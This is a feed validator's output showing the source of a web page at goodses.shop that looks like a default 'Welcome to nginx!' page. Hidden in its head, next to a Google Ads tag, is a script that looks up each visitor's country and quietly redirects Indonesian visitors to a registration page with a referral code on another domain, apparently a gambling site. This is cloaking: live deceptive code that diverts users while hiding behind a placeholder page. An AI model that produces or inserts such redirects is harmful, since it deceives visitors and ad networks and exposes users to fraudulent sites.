It looks like this is a web page, not a feed. I looked for a feed associated with this page, but couldn't find one. Please enter the address of your feed to validate.

Source: https://goodses.shop/

  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.  <title>Welcome to nginx!</title>
  5.  <meta name="viewport" content="width=device-width, initial-scale=1" />
  6.  <style>
  7.    html { color-scheme: light dark; }
  8.    body { width: 35em; margin: 0 auto;
  9.    font-family: Tahoma, Verdana, Arial, sans-serif; }
  10.  </style>
  11.  
  12.  <!-- Google tag (gtag.js) -->
  13.  <script async src="https://www.googletagmanager.com/gtag/js?id=AW-10802225397"></script>
  14.  <script>
  15.    window.dataLayer = window.dataLayer || [];
  16.    function gtag(){dataLayer.push(arguments);}
  17.    gtag('js', new Date());
  18.    gtag('config', 'AW-10802225397');
  19.  </script>
  20.  
  21.  <!-- Redirect Script -->
  22.  <script>
  23.    (async function () {
  24.      try {
  25.        const res = await fetch("https://ipapi.co/json/");
  26.        const data = await res.json();
  27.  
  28.        if (data.country === "ID") {
  29.          // Tunggu sebentar supaya tag terkirim dulu
  30.          setTimeout(() => {
  31.            window.location.replace("https://login.linkbabeltoto.pro/register?referral_code=akunvip");
  32.          }, 300); // delay 0,3 detik
  33.        }
  34.      } catch (error) {
  35.        console.error("Gagal mendeteksi IP:", error);
  36.      }
  37.    })();
  38.  </script>
  39. </head>
  40. <body>
  41.  <h1>Welcome to nginx!</h1>
  42.  <p>If you see this page, the nginx web server is successfully installed and
  43.  working. Further configuration is required.</p>
  44.  
  45.  <p>For online documentation and support please refer to
  46.  <a href="http://nginx.org/">nginx.org</a>.<br/>
  47.  Commercial support is available at
  48.  <a href="http://nginx.com/">nginx.com</a>.</p>
  49.  
  50.  <p><em>Thank you for using nginx.</em></p>
  51. </body>
  52. </html>
  53.  
Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda